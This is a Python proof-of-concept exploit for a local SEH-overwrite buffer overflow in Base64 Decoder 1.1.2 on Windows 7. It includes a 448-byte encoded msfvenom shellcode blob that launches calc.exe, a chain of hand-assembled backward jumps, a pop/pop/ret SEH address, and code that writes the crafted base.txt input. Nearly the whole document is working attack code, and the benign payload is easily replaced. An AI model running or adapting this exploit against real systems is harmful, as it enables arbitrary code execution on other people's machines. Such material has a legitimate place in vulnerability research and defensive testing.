Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)
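#!/usr/bin/env python
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)
# Date: 12-20-18
# Vulnerable Software: Base64 Decoder 1.1.2
# Vendor Homepage: http://4mhz.de/b64dec.html
# Version: 1.1.2
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Tested Windows 7 SP1 x86
# PoC
# 1. run script
# 2. copy/paste base.txt contents into 'save to file' section of app
# 3. select decode
# 4. pop calc
# orig dos poc from UN_NON, EDB: 39070
"""Generate base.txt, the SEH-overwrite input for Base64 Decoder 1.1.2.

Layout of the written file by offset (lengths follow from the constants
below; the written file is one byte shorter than the sum because the
trailing NUL of the SEH address is dropped):

    0    junk3  90 x 0x41          filler the final jump lands on
    90   calc   448 bytes          msfvenom windows/exec calc.exe (alpha_mixed)
    538  junk2  50 x 0xCC
    588  jmp3   E9 rel32 (-593)    -> offset 0
    594  junk1  20 x 0xCC
    614  jmp2   EB E4 (-28)        -> jmp3 at 588
    620  jmp1   EB F8 (-8)         -> jmp2 at 614   (nSEH slot)
    624  seh    0x0045241e LE      pop esi / pop ebx / ret, last byte 0x00

Only a calc.exe payload is shipped, but it is still machine code written to
disk: run this in an isolated lab VM and regenerate the bytes with the
msfvenom command below instead of trusting the pasted blob.  Every literal is
a bytes object so the script runs unchanged under Python 2 and 3 (the
original concatenated str with struct.pack output, a TypeError on Python 3).
"""
import struct

# Bytes the msfvenom run below was told to avoid.  The finished payload is
# checked against the same set.  NOTE(review): that these are exactly the bad
# characters of the app's 'save to file' input path is taken from the original
# comment and the dropped trailing NUL, not re-verified here.
BAD_CHARS = b"\x00\x0a\x0d\x0e"

# Filler the final jump (jmp3) lands on; execution is expected to fall through
# it into calc at offset 90 -- presumably 0x41 is chosen as a benign x86
# instruction, confirm if changing it.
junk3 = b"\x41" * 90

# msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
# Payload size: 448 bytes
calc = (
    b"\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    b"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
    b"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
    b"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
    b"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
    b"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
    b"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
    b"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
    b"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
    b"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
    b"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
    b"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
    b"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
    b"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
    b"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
    b"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
    b"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
    b"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
    b"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
    b"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
    b"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
    b"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
    b"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
    b"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
    b"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
    b"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
    b"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41"
)

junk2 = b"\xcc" * 50

# jump to calc: E9 rel32 near jmp.  rel32 = 0xfffffdaf = -593, measured from
# the byte after the instruction (offset 593), so it lands on offset 0.
jmp3 = b"\xe9\xaf\xfd\xff\xff\xcc"
junk1 = b"\xcc" * 20
# jump to jmp3: EB rel8 short jmp, -28 from offset 616 -> 588.
jmp2 = b"\xeb\xe4\xcc\xcc\xcc\xcc"
# jump to jmp2: EB rel8 short jmp, -8 from offset 622 -> 614.  This occupies
# the nSEH slot, i.e. what the pop/pop/ret gadget returns into.
jmp1 = b"\xeb\xf8\xcc\xcc"

# 0x0045241e : pop esi # pop ebx # ret   (address from the original advisory)
# Packed little-endian its last byte is 0x00; build_payload() strips that one
# byte, exactly as the original buffer[:-1] did.
seh = struct.pack("<L", 0x0045241e)


def _jump_target(offset, instr):
    """Return the payload offset that a jmp located at *offset* lands on.

    *instr* holds the raw jump bytes, either ``EB rel8`` (2 bytes) or
    ``E9 rel32`` (5 bytes); trailing filler is ignored.  The displacement is
    relative to the byte following the instruction.  Raises ValueError for
    anything else.
    """
    opcode = instr[0:1]
    if opcode == b"\xeb":
        return offset + 2 + struct.unpack("<b", instr[1:2])[0]
    if opcode == b"\xe9":
        return offset + 5 + struct.unpack("<i", instr[1:5])[0]
    raise ValueError("not a jmp: %r" % (instr,))


def build_payload():
    """Assemble the overflow string and return the bytes to write to base.txt.

    Raises ValueError when the pieces no longer match the layout the jumps
    were hand-assembled for (shellcode length, jump chain, bad characters),
    so a regenerated shellcode of a different size fails loudly here instead
    of sending the target into filler at a wrong offset.
    """
    if len(calc) != 448:
        raise ValueError("shellcode is %d bytes, jumps assume 448" % len(calc))

    off_jmp3 = len(junk3) + len(calc) + len(junk2)
    off_jmp2 = off_jmp3 + len(jmp3) + len(junk1)
    off_jmp1 = off_jmp2 + len(jmp2)
    chain = (
        ("jmp1", _jump_target(off_jmp1, jmp1), off_jmp2),
        ("jmp2", _jump_target(off_jmp2, jmp2), off_jmp3),
        ("jmp3", _jump_target(off_jmp3, jmp3), 0),
    )
    for name, landed, wanted in chain:
        if landed != wanted:
            raise ValueError("%s lands at %d, expected %d" % (name, landed, wanted))

    layout = junk3 + calc + junk2 + jmp3 + junk1 + jmp2 + jmp1 + seh
    # Drop the NUL that ends the little-endian SEH address (see `seh`).
    payload = layout[:-1]

    # Under Python 2 both sets hold 1-char strs, under Python 3 ints; either
    # way the intersection is the set of offending bytes.
    bad = set(BAD_CHARS) & set(payload)
    if bad:
        raise ValueError("payload contains bad chars: %r" % (sorted(bad),))
    return payload


def main():
    """Write base.txt into the current directory (step 1 of the PoC)."""
    with open("base.txt", "wb") as f:
        f.write(build_payload())


if __name__ == "__main__":
    main()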